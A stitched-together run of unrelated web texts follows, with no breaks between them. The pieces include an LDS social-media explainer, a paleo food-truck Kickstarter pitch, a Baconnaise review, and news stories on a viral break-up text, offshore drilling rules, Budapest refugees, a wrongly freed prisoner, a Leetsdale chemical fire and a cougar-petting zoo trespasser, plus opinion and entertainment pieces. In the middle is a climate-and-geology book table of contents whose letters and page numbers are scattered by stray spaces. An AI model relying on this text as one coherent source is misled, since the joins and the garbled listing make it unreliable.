A comprehensive list of the official Church social media pages can be found on LDS.org . Recently the Church created Facebook and Google+ pages for each member of the First Presidency and the Quorum of the Twelve Apostles . Now anyone who follows their pages will receive regular updates on their teachings . A list of those pages can be found on LDS.org .
Why use social media ?
Social media channels allow gospel messages , such as those from general conference talks , to be easily and widely shared . For example , posts shared on the Church 's official Facebook account are not only seen by hundreds of thousands of followers , but are also shared by tens of thousands of those followers with their own Facebook friends .
Social media is also a convenient venue for members to share their testimony of the gospel . Social media officially became part of missionary work when Elder L. Tom Perry announced during the Hastening the Work broadcast that missionaries would use the Internet—including Mormon.org , Facebook , blogs , email , and text messages—in their proselyting efforts ( see L. Tom Perry , “ Missionary Work in the Digital Age ” [ worldwide leadership training meeting , June 2013 ] , LDS.org/broadcasts ) .
What is a hashtag ?
A hashtag is created whenever a person posting a message through social media adds the # symbol before a word or phrase . Using a hashtag helps categorize and organize related messages so others can easily search and find conversations on certain topics . For a list of commonly used and recommended hashtags for LDS topics , see this Mormon Newsroom article .
What is a meme ?
An Internet meme is often an image combined with a short amount of text . The Church often creates memes by combining compelling images with uplifting quotes from Church leaders to share through its social media channels . The following meme was shared during the Relief Société Générale meeting .
Visit LDS.org to learn more about Facebook , Twitter , and Google+ .
Be a Part of Seattle 's First Paleo Food Truck !
We need your help to get our project started . Kickstarter is an all or nothing fundraising site . When you pledge , we reward you according to the pledge level . If we do not raise the $ 20,000 for the truck and initial equipment within the 45 days , we will not get funded and your card will not be charged . If we do get funded , we will reward you based on your pledge and you will be part of the first and best Paleo Truck in Seattle !
What is the O.T.B .
Outside the Box is a project created by Cata Catering Company . Outside the Box is a mobile food truck that will cater towards customers seeking to follow their personal dietary needs and those following a healthier eating lifestyle . Our distinct menu will include high quality ingredients without the use of processed foods . Real food made from natural ingredients . Outside the Box will be mobile and visit various Crossfit boxes and other fitness facilities.​
Our mission :
The mission of Outside the Box is to be the first mobile food truck in the Seattle area to provide delicious paleo friendly and healthy meal options to the residents , visitors , and athletes of the Greater Puget Sound area .
What we serve :
Outside the Box will serve primarily paleo meals , salads , wheat and dairy free options , a vegetarian and low carb menu and specialty drinks . Everything served will NOT contain , gluten , dairy , added sugar , or processed foods . Outside the box will also have frozen ready to warm and serve meals to take home and keep handy for those days you need a quick meal .
Who we are :
Charles Aguiling ( co-owner of Cata Catering Company ) :
Started learning knife and sauce skills around 7th grade following his dad around catering gigs . His dad was the executive chef at The Harbor Club in Seattle during the 80 's and 90 's and has shown him many valuable life skills , including cooking . Charles has furthered his skills through the many stacks of Bon Appétit magazines , various cookbooks , and TV cooking shows . He loves cooking for family and friends and believes food is one the best relationship tools . More importantly he enjoys teaching his son Ashton valuable life skills , including cooking .
Donna Denina ( co-owner of Cata Catering Company ) :
Grew up with a cornucopia of fruits and vegetables that went from the backyard straight into her mother 's kitchen and on the dinner table . Her grandfather , a seasoned farmer from her native country , the Philippines , immigrated to the US in the early 80 's and cultivated the land into fertile soil , producing eggplant , green beans , bitter melon , peppers , squash , sugar cane , garlic , onions and so much more . Donna would often help her mom out in the kitchen , cooking meals using vegetables harvested from the backyard . Finding a passion for cooking later in her adult life , it brings a self of nostalgia cooking for her own family , friends and her surrounding community .
Marizel Yuen ( co-owner of Cata Catering Company ) :
Began experimenting with food cooking for her younger siblings . She attended Seattle Culinary Academy in 2000 while working for various Seattle restaurants such as Ponti , Chinoise on Madison , and Washington Athletic Club .
How can you help :
You can help us with 3 easy steps :
1 ) Pledging whichever level you feel most comfortable with . Anything and everything will help get us there .
2 ) Share this kickstarter site with your family and friends and everyone else you know .
3 ) Keep in contact with us on facebook and Twitter and follow our progress
We are hoping to raise $ 20,000 for the sole reason of purchasing the truck and equipment upgrades needed to get it up and running .
$ 15,000 for the Truck and $ 5000 for the equipment and initial ingredients and supplies .
It 's an all or nothing deal . If we do n't make our goal in 45 days , we do n't get funded , you do n't get your rewards , your credit card does not get charged , and Seattle is without a Paleo Food Truck .
Thank you all for visiting this site and watching the video .
Let 's make this Happen ! ! !
Special Thank Youare :
* Thank you to our significant others for your continuous emotional support and helping us keep focused . Love you !
* Rod Habon for your hard work with the camera and editing , and working extra hours putting the video together .
* Ray Maranan for creating the logo that will be the brand for Mobile Paleo food in Seattle .
* Blue Scholars for permission of instrumentals on video .
* King Crossfit for supporting our project in many ways and a being major influence in this project .
Baconnaise . It 's the manna of the grocery gods , the jarred deliciousness of smoky , bacon spreads . It 's delicious .
A little dab makes a sandwich less drab . Mixed with tuna or chicken , salads come alive . With hard-boiled egg centers , and deviled eggs take on a heavenly flavor . And , finally , mixed half-and-half with sour cream , expect greatness as a fresh , tasty vegetable dip .
Tip : Baconnaise contains only 1 net carb per Tbsp and 80 calories .
I admit to not having much luck initially working Baconnaise into a recipe . A failed attempt at oopsie rolls with Baconnaise as the fat netted a disaster that halted progress , at least momentarily .
Thankfully , unlike the failed meringue bread tweak , the slightly salty , mellow undertones of bacon mayonnaise blends wonderfully with the addition of fresh , kicky sour cream for dipping vegetables , meats , as a makeshift hollandaise sauce over eggs , or especially with roasted green beans .
Tip : Baconnaise contains eggs , so be sure to keep the product refrigerated after opening .
The other thing I love about this dip ? It has a strangely familiar flavor , and I 've just placed it ; it tastes just like the onion ring dipping “ Campfire Sauce ” from Red Robin . Now I want to make onion rings , too .
Tip : This dip is only .75 carbs per serving and only 55 calories .
I 'm going to warn you now : This dip is addicting . I stood at the counter and dipped roasted green beans [ recipe here ] until I slapped my own hand ( I stopped at a single serving . Honest ) . Still , I can envision eating an entire tray of roasted green beans with Baconnaise dipping sauce and being in heaven .
Easy Veggie Dipping Sauce
1/4 cup J & D 's Baconnaise ( or other flavored mayonnaise )
1/4 cup sour cream
Combine . Keep cold . Get a manicure . You 've done enough .
Makes 1/2 cup dipping goodness , or 4 , 2-Tbsp servings .
Per Serving : Calories : 55 , Carbohydrates : .75 g , Fiber : 0 g , Net Carbohydrates : .75 g , Protein : .5 g , Fat : 5.7 g
J & D 's Baconnaise
Rating : ♥♥♥♥♥
Price : $ 2.49-2.79 for 15 fl . ounces
Usefulness : As a delicious , zesty spread
Negative : If you suffer from MSG sensitivities , be careful ; this product contains autolyzed yeast extract and smoke flavor .
Store Locator : Where to buy
Website : J & D 's
Disclosure : J & D 's provided this product free of charge for review , but this has not affected my review of the item .
Perhaps the man whose break-up text is now going viral should have stuck with “ it 's not you ; it 's me . ”
Instead , the unnamed , disgruntled guy texted his now ex a list of six reasons he was dumping her , after dating for less than two months . This list was posted on Twitter by the dumpee 's friend , Amy Nelmes , from Sydney , Australia .
“ My friend just sent me this break-up message she received after 7 weeks of dating . My fav reason for split is # 3 , ” she tweeted .
That would be , “ You are rude to my cat and that makes me feel uncomfortable . ”
As of this afternoon , her tweet has been retweeted over 15,000 times .
The number one reason on the list is , “ You refuse to update your relationship status on Facebook . ”
Number six , however , is the most narrow-minded : “ You wo n't disclose how many sexual partners you have had which makes me think it is upwards of 3 and anything more than that is unacceptable . ”
Both of the no-longer-lovers are unknown , but the women spoke to an Australian news website , ninemsn , about her ex . “ He was 30 , had a job , a car and a house . Certainly not what I normally manage to attract , so I thought I was onto something , ” she said . ” He was a bit of a nerd , perhaps a bit quiet , but a genuinely nice guy all the same . ”
She explained to the website that 's allergic to cats , hence her “ rudeness ” to the guy 's . She also says she did n't write back—and that she 'll never date another man with a cat .
Can an artificially intelligent device replace the PPC manager ? How effective will be machine learning to manage PPC campaigns ? Let 's explore .
We all know that Artificial Intelligence ( AI ) is overtaking everything . PPC is no exception . Experts predict that the jobs of PPC professionals are in grave danger as the adoption of AI and Machine Learning is growing . But are these just scary probabilities or do these predictions carry any truth ?
The truth is that it is time to say goodbye to the PPC manager with the old skillset . PPC managers who are able to evolve with the changing trends will stay around .
Image Source : http : //www.freepik.com/free-vector/he-is-going-to-travel_932709.htm # term=goodbye & page=1 & position=2
Before we explore the how and why this is happening , let 's dive into some background . We all know that AI and Machine Learning are growing and will potentially be applied to a number of tasks . Yes , the human brain has a tremendous potential . This potential , however , hits an obstruction when faced with the need of processing large amounts of data . This is one of the most important reasons for AI and Machine Learning to become popular . It can help process large volumes of data rather quickly .
How does AI work ?
Besides processing large amounts of data , AI is used to understand and identify patterns . The more data AI has to process , the more accurate it keeps getting . With more data , AI gets the knowledge to predict what the users want and what to expect in case of a particular situation .
PPC and Automation
The task of an average PPC campaigner is to manage multiple campaigns and keep a track of them in spreadsheets . Automation can help to preset the data collection process and reduce the workload of the PPC professional . For example , the tool Google Anomaly Detector keeps a track of the campaign on an hourly basis and sends alerts whenever there are changes .
Automation will help PPC campaigners to collect performance data and then use a secondary automated system to assign or discontinue the activity without the need of the PPC manager having to intervene . Automation and AI are still at a stage where the expertise of PPC managers is required to monitor automated operations , identify anomalies and take corrective action when errors happen .
Humanizing of products
We have started treating products like Siri and Cortana as humans to answer our questions . Voice searches are becoming increasingly common . What does this mean for PPC ? It means that more than the search , the human intent has to be understood .
Like James Murray Product Marketing Manager at Bing says , it 's predicted that 50 % of searches will be voice searches by 2020 . He added that for marketers this means thinking in natural language terms . Look at the two examples below ; the first is the keyword-orientated style search that users have been 'taught ' will get them results . The second is a much more natural approach , the type that would be more commonly found in a voice search .
a ) cheap turkey holidays orb ) cost of a family holiday in Turkey
He believes that machine can be really good at voice recognition . Some of the tips he gives to optimize Pay Per Click campaign management as per the changing trends are to change keywords more like natural questions , take prepositions into consideration like ‘ for ' , ‘ and ' , etc . consider a broader spectrum of the keyword , also consider ‘ near me ' queries with geo-targeted campaigns .
Want to learn more about the impact of AI for PPC ? Let 's have a chat .
Arizona Beer Week , an annual state-wide event , is a celebration of Arizona craft beer . This year , Storyteller PR ( in collaboration with your favorite Tucson breweries ) is bringing the festivities even more local with an exciting end cap downtown . The inaugural Tucson Craft Beer Crawl ( TCBC ) takes place Saturday , February 21 , from noon to 4pm .
On the day of the event , bring printed tickets and ID to 33 South 5th Ave ( Connect Coworking ) to check in and you 'll receive a personal five ounce tasting glass , wristband , and a map . Participating venues include Hotel Congress , R Bar , Thunder Canyon Brewery , Playground , Pueblo Vida , Borderlands and Tap & Bottle . Note the close proximity , a perk you may appreciate more after a few beer samples .
“ I love events that build community and have a strong sense of place , ” said Storyteller PR principal Laura Reese . “ I 'm a huge fan of events like Brew at the Zoo at Reid Park and Art on Tap at the Tucson Museum of Art—they support brewing and reflect Tucson in such an awesome way . TCBC lets people enjoy local brews while soaking in the vibe , history and architecture of downtown , all while supporting a great cause . ”
Tucson has a steadily growing brewing community , and it is expected to grow even more in 2015 . Dragoon Brewing recently added 12,500 square feet to support 2015 plans to increase distribution throughout the state and begin canning .
“ We 're really excited to be a part of the Tucson Craft Beer Crawl because of the great sense of community that has grown in downtown Tucson , ” said Tristan White , General Manager at Dragoon . “ Sharing beer with friends and the community is what we 're all about and we 're happy to help support Watershed Management Group , a non-profit we believe in . ”
A portion of the proceeds will be donated to Watershed Management Group . Executive Director Lisa Shipek says the organization plans to use the funds to support their work to restore Tucson 's rivers . “ At WMG , we love watering holes , so we 're thrilled to be partnering with some of Tucson 's best downtown bars and local brewers for this event , ” said Shipek . “ We invite everyone to get involved and learn more at watershedmg.org/tucson-rivers . ”
Purchase tickets and find more information at TucsonCraftBeerCrawl.com and on Twitter @ craftbeerTUC .
President Donald Trump 's administration is considering ending a variety of regulations on offshore oil drilling from his predecessor 's era , The Wall Street Journal reports .
Repealing the rules put in place after the 2010 Deepwater Horizon oil spill could save energy companies almost $ 1 billion in the next decade , according to a report from the Bureau of Safety and Environmental Enforcement . Most of these rules are safety regulations that industry officials argue are too broad .
`` Based on BSEE experience during the implementation of the original [ well control rule ] , BSEE has concluded that the term 'safe ' creates ambiguity in that it could be read to suggest that additional unspecified standards , beyond those expressly stated , may be imposed in the approval of proposed drilling margins , '' reads a preamble to the BSEE 's proposal , which was sent to the White House on Dec. 8 , according to the Journal .
In mid-December , Trump touted his efforts to reduce government regulation , telling reporters at a White House ceremony `` we beat our goal by a lot , '' according to The Hill .
`` Instead of adding costs as so many others have done … for the first time in decades , we achieved regulatory savings . Has n't happened in many decades . We blew our target out of the water . ''
`` Instead of eliminating two old regulations for every one new regulation , we have eliminated 22 ; that 's a big difference , '' Trump said . `` We aimed for 2 for 1 and in 2017 we hit 22 for 1 , and by the way , those regulations that are in place do the job better than all the other regulations and they allow us to build and create jobs and do what we have to do . ''
Far-right groups attacked the refugees and migrants encamped outside Keleti station in Budapest , Friday , as Hungarian authorities continue to treat the migrant and refugee crisis as a security operation . As the confrontations broke , police struggled to maintain order with many of the refugees and migrants forming human chains to protect women and childen.Hungarian authorities have taken radical measures in early September to deal with the unprecedented people crossing their borders , many without documentation . Firstly , they closed the main station with trains leading to Austria , Germany and other European destinations . This led to a temporary encampment being set up , with around 3,000 refugees around Keleti station . When the station re-opened , many boarded trains that were destined for processing and detention camps , not other countries as they thought . Thousands have protested against the authorities.Video ID : 20150904-140Video on Demand : www.ruptly.tv Contact : cd @ ruptly.tv
4 . 6 T h e D i s c o v e r y o f t h e I c e A g e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 4 4 . 7 Th e D i sc ov er y o f P as t W ar m P o la r R eg i on s . . . . . . . . . . . . . . . . . . . . 86 4 . 8 Th ro wi ng a M on ke y Wr en ch in to Ex pl ai ni ng Cl im at e Ch an ge . . . . . . . 87 4.9
‘
Crustal Mobility
'
t o t h e R e s c u e . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 7 4 . 10 Th e R et ur n o f C at as tr op hi sm an d t he Id ea of Ra pi d C han ge . . . . . . . . . 88 4 . 11 Th e N at ur e o f t he Ge o lo gi c R ec or d . . . . . . . . . . . . . . . . . . . . . . . . . . 89 4 . 12 Th e G re at E xt in ct io ns an d T he ir Ca us es . . . . . . . . . . . . . . . . . . . . . . . 90 4 . 1 3 S u m m a r y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1
5 Pu tt in g N um be rs on Ge ol og ic Ag es
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 0 3 5 . 1 1 7 8 8
—
An by ss o f Ti me o f Un kn ow n Di me ns io ns . . . . . . . . . . . . . . 10 3 5 . 2 1 8 6 3
—
Physics Comes to the Rescue
—
Earth Is not More Than 10 0 Mi l li on Y ea r s Ol d. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10 3 5 . 3 Wh at We No w K no w A bo ut He at fr om Ea rt h
'
s I nt er i or . . . . . . . . . . . . 10 4 5.4 Som e He lpf ul B ack gro und In Und ers tan din g 19 th Cen tur y C he m is tr y. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10 5 5.5 Ato mic Wei ght , At omi c Ma ss , Iso top es , R ela tiv e At omi c Ma ss , Standard Atomic Weight
—
A Co nf us in g Pl et ho ra o f Te rm s. . . . . . . . . . 10 7 5 . 6 1 8 9 5
–
1913
—
The Worlds of Physics and Chemistry Tu rn ed U ps i de D ow n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 0 5 . 7 H en r i B ec q ue re l a n d t he C ur i es . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 0 5 . 8 No nc on fo rm is ts a nd t he B ri ti sh U ni ve rs it ie s Op en t o Al l . . . . . . . . . . . 11 3 5 . 9 Th e D is co ve ry of El ec tr on s , Al ph a- Ra ys , an d B et a- Ra ys . . . . . . . . . . . 11 5 5.10 The D iscov ery of Radio activ e Decay Seri es , Ex ponen tial Decay Rate s , an d Se cu la r Eq ui li br iu m. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 6 5 . 11 Th e My st er y o f t he D ec ay S er ie s Ex pl ai ne d by Is ot op es . . . . . . . . . . . 11 7 5.1 2 The Di sco ver y that R adi oac tiv e Deca y Ser ies Mi ght B e Used to D et er mi ne t he A ge o f Ro ck s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 8 5 . 13 Th e Di sc ov er y of St ab le I so to pe s . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 0 5 . 14 Re th in ki ng t he S tr uc tu re o f t he A to m. . . . . . . . . . . . . . . . . . . . . . . . . 12 0 5 . 15 Fr om Sc ie nc e t o Sc ie nc e Fi ct io n . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 1 5 . 16 Th e Di sc ov er y of Pr ot on s an d N eu tr on s . . . . . . . . . . . . . . . . . . . . . . . 12 2 5 . 17 Ar th ur H ol me s an d t he A ge o f th e Ea rt h . . . . . . . . . . . . . . . . . . . . . . 12 5 5 . 18 Th e De ve lo pm en t of a Nu me ri ca l Ge ol og ic al T im es ca le . . . . . . . . . . . . 12 6 5 . 1 9 S u m m a r y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 2 7
6 Doc umen ting Pas t Clim ate Cha nge
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 3 5 6 . 1 W h a t I s
‘
Climate
'
? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 3 5 6 . 2 A Br ie f Ov er vi ew of Ea rt h
'
s Cl im at e Hi st or y . . . . . . . . . . . . . . . . . . . 13 6 6 . 3 Th e Ce no zo ic Cl im at e
‘
Deterioration
'
. . . . . . . . . . . . . . . . . . . . . . . . 1 4 2 6 . 4 Fr om Ag es t o P ro ce ss R at es . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 3 6 . 5 Ra di om et ri c Ag e D at in g in th e M id -2 0t h C en tu ry . . . . . . . . . . . . . . . . 14 4 6 . 6 P o t a s si u m
—
A r go n D at in g . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 5 6 . 7 Re ve rs al s of Ea rt h
'
s M ag ne ti c Fi el d. . . . . . . . . . . . . . . . . . . . . . . . . . 14 6 6 . 8 Fi ss io n T ra ck D at i ng . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 9 6 . 9 A st r on om i ca l D at in g . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 9 6 . 10 Tr it iu m , C ar bo n- 14 a nd Be ry ll iu m- 10 . . . . . . . . . . . . . . . . . . . . . . . . 14 9 6 . 11 Th e Hu ma n Ac ce le ra ti on o f Na tu ra l Pr oc es s Ra te s . . . . . . . . . . . . . . . 15 0 6 . 12 Th e Pr es en t Cl im at e in I ts G eo lo gi c Co nt ex t. . . . . . . . . . . . . . . . . . . . 15 1 6 . 13 St ea dy S ta te V er su s No n- st ea dy St at e . . . . . . . . . . . . . . . . . . . . . . . . 15 5 6 . 1 4 F e e d b a c k s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 5 6 6 . 1 5 S u m m a r y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 5 7
For yet another spring , a red-winged blackbird has been divebombing people as they walk by its nest on Parliament Hill .
Male red-winged blackbirds screech at other males to protect their territory , and sometimes they 'll attack people who come close to their nests . ( AP Photo ) The fun speculations abound .
Maybe it 's mad it was n't chosen as the unofficial bird of Ottawa , or perhaps this is the bird 's way of pushing for Senate reform ?
Maybe the Parliament Hill bird is hoping for this kind of CBC TV coverage .
More likely , it 's simply protecting its family .
But it did n't take long for a Twitter account to materialize , of course .
. < a href= '' https : //twitter.com/ThomasMulcair '' > @ ThomasMulcair < /a > I am completely in favour of Senate abolition . That is 105 fewer people threatening my nest by the Senate entrance . < a href= '' https : //twitter.com/hashtag/cdnpoli ? src=hash '' > # cdnpoli < /a > — @ ParlBird Its yoga on the Hill today . Excellent . — @ ParlBird I was just attacked by a bird in front of an elementary school class and a group of Parliament staff , how 's your morning going ? — @ daniellediscala She 's baa-aack . < a href= '' https : //twitter.com/cmaconthehill '' > @ cmaconthehill < /a > : I just got attacked by the infamous Parliament Hill bird . I did n't know the attack season had begun . — @ kady After that bloody bird in front of Parliament nailed me three times in a row on the head , I 'm a little paranoid . — @ KimberleeTaylor
Poll question
On mobile ? Vote here on whether you 've been attacked by an red-winged blackbirds .
Image copyright Met Police Image caption Ralston Dodd was serving time for attacking a 21-year-old man with a knife
An `` extremely dangerous '' prisoner has been released early from a nine-year jail term after his sentence was recorded in error as nine months .
Ralston Dodd , 25 , was jailed in November after he admitted stabbing a man three times in the back following an argument on a north London street .
The Ministry of Justice ( MoJ ) said such releases in error were `` extremely rare '' and it was investigating .
A warrant for Dodd 's arrest has been issued .
Dodd attacked a 21-year-old man with a knife in Islington on 18 September 2016 , before going on the run .
He was arrested on 11 October and was sentenced to nine years ' imprisonment at Blackfriars Crown Court on 11 November after pleading guilty to causing grievous bodily harm with intent .
After his sentencing , Det Insp Will Lexton-Jones said the inquiry had `` ultimately led to an extremely dangerous offender being jailed '' .
He added : `` This was an appalling act of violence that almost cost a man his life . The seriousness of this offence is reflected in the extensive prison sentence . ''
Dodd , from Islington , was being held in custody at HMP Thameside in south-east London before his release .
Image caption Dodd was released from HMP Thameside
The Sun newspaper reported that after he was released he was spotted in a car by his victim .
His father told the newspaper his son `` could have died '' in the attack .
`` I held my son and thought he was going to die . How can this happen without anyone noticing ? , '' he said .
An MoJ spokeswoman said such releases in error are `` extremely rare but we take any case very seriously '' .
`` We are urgently investigating so we learn the lessons to prevent it happening again , '' she said .
`` Public protection is our priority . ''
A Metropolitan Police spokesman said it wished to trace a man `` for being unlawfully at large '' .
I have a confession : When Donald J. Trump swept five primaries on Tuesday , I was a little bit excited . And I do n't think I 'm the only person who despises the role racism plays in American life who feels this way .
Let me explain .
For a certain group of voters , part of Mr. Trump 's appeal is obvious . They hear their own views echoed in his divisive and bigoted rhetoric . They 're the ones who nod in agreement that Mexican immigrants are rapists who are “ bringing drugs ” and that all Muslims should be barred from entering the United States . They 're people who think the linguistic anachronism “ the blacks ” sounds appropriate . They yearn for the return to a long-lost “ great ” version of America that it 's safe to guess existed before the implementation of the Civil Rights Act .
I 'm not in this group . The prospect of a Trump presidency horrifies me . Like many others , I find the bigotry behind the Republican front-runner 's most controversial views infuriating and frightening .
But I also find it familiar . I 'm a journalist who writes about race , so I spend a lot of time thinking about the way racism shapes American life , both in individual interactions and in the way institutions operate . What 's most frustrating is that , despite all the evidence , convincing people who would rather not believe that this is real can be hard .
Feminism has become silly , maybe even dangerous
By Martin Bosworth
Hyperbolic ? Perhaps . But that 's the only conclusion I could come to after reading this morning that Reid is planning an end-run around Chris Dodd 's threat to filibuster any FISA legislation that contains immunity for telecom companies that participated in the NSA spying program . Glenn Greenwald , as always , has all the nasty details . More from Lambert at Correntewire and Matt Stoller .
It 's been a while since I 've posted about this , so here 's a reminder of why preventing telecom immunity is important . And Chris Dodd 's campaign has tips on what you can do to support the filibuster .
I used to support Harry Reid during the darkest days of GOP domination of Congress in the Bush era . He demonstrated gumption and courage when necessary . I do n't know what happened to that man , but this guy is no friend to progressives , the Constitution , or his own party .
In one fell swoop , he is enabling the Republican party agenda of protection for corporate malfeasance , dispiriting and disenchanting the Democratic activist base , and cementing the image in the minds of the public that the Democrats are weak , cowardly pussies who wo n't fight for principle even when they can win at it . Nice work if you can get it .
We need better laws , better Democrats , and real progressives in Congress . Harry Reid has shepherded too many unnecessary compromises that tar his party and make those of us who backed him look like fools . He , just like Bush and company , needs to go .
Upon taking the Senate floor to discuss the FISA reauthorization , Reid said “ I 'll guarantee you right now , one thing that 's going to occur : not everyone will be happy . People have the obligation to do what they think is right. ” Well , Harry , you 're right . We 're NOT happy , and we ARE going to do what we think is right . And that means getting you bounced out of your cushy Majority Leadership position and right out the doors of the Senate chamber .
0 Crews battle hot spots after 5-alarm industrial fire ; 2 more firefighters being treated
LEETSDALE , Pa. - Firefighters returned Wednesday to Leetsdale Industrial Park to put out hot spots after a massive five-alarm industrial fire Tuesday .
Crews battled the blaze for hours Tuesday before it was brought under control . However , hot spots have flared up , forcing firefighters to return to the scene .
Related Headlines PHOTOS : Crews battling massive industrial fire in Leetsdale
FREE APPS | NOW | FACEBOOK | TWITTER
The site and buildings involved in the fire are owned by The Lubrizol Corp . The site is the company 's Oilfield Chemistry site .
Buildings heavily damaged in the fire are expected to be demolished Wednesday .
Allegheny County Emergency Services officials issued an evacuation order Tuesday for all homes on Washington Street in Leetsdale Borough . Over 70 homes were evacuated , according to officials .
https : //twitter.com/Allegheny_Co/status/666653316085096454
Hazmat representatives visited residents door to door to relay the orders .
Residents were evacuated to the Quaker Valley High School gymnasium and remained there until it was safe to return to their homes .
Around 3:30 p.m. , the evacuation order was lifted for Washington Street in Leetsdale Borough .
Preschools in Ambridge , Aliquippa and Hopewell were told to keep children inside because of the fire and smoke blowing in that direction .
Beaver County Emergency Services suggested Hopewell School District dismiss high school students early during the fire .
Emergency officials asked motorists to avoid Route 65 while emergency crews were making their way to the scene .
Officials said Wednesday that two firefighters from Emsworth are being treated at a hospital after being exposed to the smoke .
On Tuesday , three firefighters from Leetsdale and one from Sewickley were treated . The fire chief said they are OK .
Three workers were hospitalized , including one who was taken to Mercy Hospital with chemical burns . Two additional workers were evaluated on the scene but were not taken to the hospital .
Two chemicals , ammonium persulfate and sodium chlorite , were being released and are inhalation contact problems .
At the height of the fire , flames could be seen shooting through the roof .
Officials said one of the buildings appeared to be a total loss after it collapsed . The second building has significant fire and water damage .
Four of eight people who suffered injuries were firefighters , officials said .
Several residents in the area told Channel 11 News that they had problems evacuating because of a closed bridge .
“ The biggest problem is there was n't another entranceway to come back down onto the street . There is only one , ” said Sandy Martin .
Martin grew up on Washington Street , and her mother still lives there .
She 's upset the bridge could n't be used during evacuations .
While the bridge is open to foot traffic , it 's been closed to vehicles since 2013 .
Ambridge resident James Gibson talked to Channel 11 and said he reluctantly drove his daughter to work near the inferno .
“ They were telling people to close their windows , do n't come out in the air , ” he said . “ So now they have them coming to work . It does n't make sense to me . ”
Ed Michalowski , a spokesman for Lubrizol , said he is thankful the fire did n't cause any loss of life .
“ I 'm glad everybody got out , ” he said . “ Everything else that 's there can be replaced . ”
Anijah Kimbrough , a fourth-grade student in Ambridge , told Channel 11 that smoke forced a change of plans at the school .
“ We were n't allowed to go outside or anything , we had to stay in the classroom . ”
The Allegheny County fire marshal will be investigating the cause of the fire .
Early results from Lubrizol indicate that the fire started as hydraulic fracturing chemicals were transferred to a tank .
The Allegheny County Health Department is monitoring the air and said it is safe to breathe .
'Cougar petter ' sentenced to jail time Copyright by WCMH - All rights reserved Joshua Newell ( right ) was sentenced to 2 days in jail and a $ 200 fine . [ + - ] Video
COLUMBUS ( WCMH ) -- In court today , Josh Newell , the barrier jumping , cougar-petting 35-year-old said he hoped the Columbus Zoo would drop the trespassing charge against him . But that was n't going to happen .
In fact , not only was he sentenced to two days in jail and given $ 350 in court costs and fines , but the zoo has banned him for two years .
The zoo said they have never banned anyone before .
Over the weekend he admitted to NBC4 that what he did last week , videotaping himself petting cougars at the zoo , was n't such a good idea .
`` if I had to do it over , I would 've stayed within the barrier boundaries , '' he told NBC4 on Sunday .
But today , he left court with a friend wearing special t-shirts to commemorate the stunt : `` cougar love `` and `` make a wild thing purr . ''
He says he jumped the barrier , petted the cougars and sent it to YouTube to show a friend who had posted video of himself surfing with sharks .
We asked him if he was just doing this for attention .
`` No , The Columbus Zoo wants the attention , '' he said . `` So , I mean , this changed my life and turned it around so I 'm trying to embrace it at this point . ''
He also said the zoo was making this a national story .
`` I had 15 views . The Columbus Zoo got ahold of it and now it 's like 500,000 or whatever it is . So they 're the ones that made me a YouTube sensation ... They 're the ones who are getting all the publicity , people are probably wanting to go to the zoo now to see the cougars , '' said Newell . `` I 'm not that type of person that wants that attention . They 're giving it to me so instead of stressing myself out I 'm trying to embrace it . ''
Today the zoo is n't finding any humor or entertainment in any of it .
John Gannon is the Senior Vice President of guest services .
`` That 's why why we did decide to press criminal trespassing charges against this gentleman , because it is a serious situation , '' he said . `` And he could have risked his injury as well as our animals can be injured if guests do n't do what they 're supposed to do . ''
Newell previously told NBC4 he expected to be fined , but hopes he 's not banned from the zoo .
`` I 've thought about reaching out to them to do some volunteer work or donations , anything I can do to help them out , '' he said .
You can see the full video below :
http : //www.youtube.com/watch ? v=51w3hT_XByo
Following the reports of SM Entertainment preparing for the comeback of a unit group , it has now been confirmed that the unit in question is none other than Donghae & Eunhyuk , a sub-unit of Super Junior .
According to sources in the industry , the unit will release a new album sometime next week , the first week of March . They have also been confirmed to hold their comeback stage through KBS2TV 's “ Music Bank ” on March 6 , and will continue on to promote their album on other music shows . The album , which is the duo 's first non-digital single release , is said to be in final stages of production .
Donghae & Eunhyuk debuted in December 2011 with the loved single “ Oppa , Oppa , ” and have recently been active in Japan , releasing singles and holding extremely successful tours .
Are you excited about their comeback ?
Source ( 1 )
Luckless Seven is a coming of age story with a focus on developing a personality for Mark , the main character , and seeing the impact of your decisions on your friends and family .
The overarching narrative involves travelling from city to city and participating in Casino qualifiers ( similar to gym leader battles ) and progressing your way through a large national tournament . Outside of battling people however , Mark will have significant involvement with the people he travels with .
Character progression will be expressed through increased dialogue options and more powerful Ekosi cards . Besides card battles , the player will also be able to interact with many NPCs and witness many story-creating events when they explore Arithia 's cities .
Decide how events play out
Every choice has a consequence
Features :
A story-driven experience that explores personal relationships and how people choose to shape themselves .
Fast-paced card battle system inspired by Pazaak .
Complex dialogue trees that allow for multiple ways to impact the story .
Social leveling system that allows you to develop a personality which provides unique responses in conversation ..
An immersive 3D world - explore a diverse set of isometric environments .
Original Soundtrack
Explore immersive environments
Ekosi is inspired by Pazaak ( which plays like Blackjack , but you have a hand in which you can play cards to manipulate your score ) .
Our current demo offers a vertical slice of our game and showcases many of its systems and features .
Click here to download the demo from our IndieDB page .
https : //soundcloud.com/npc-23/sets/luckless-seven-ost-1
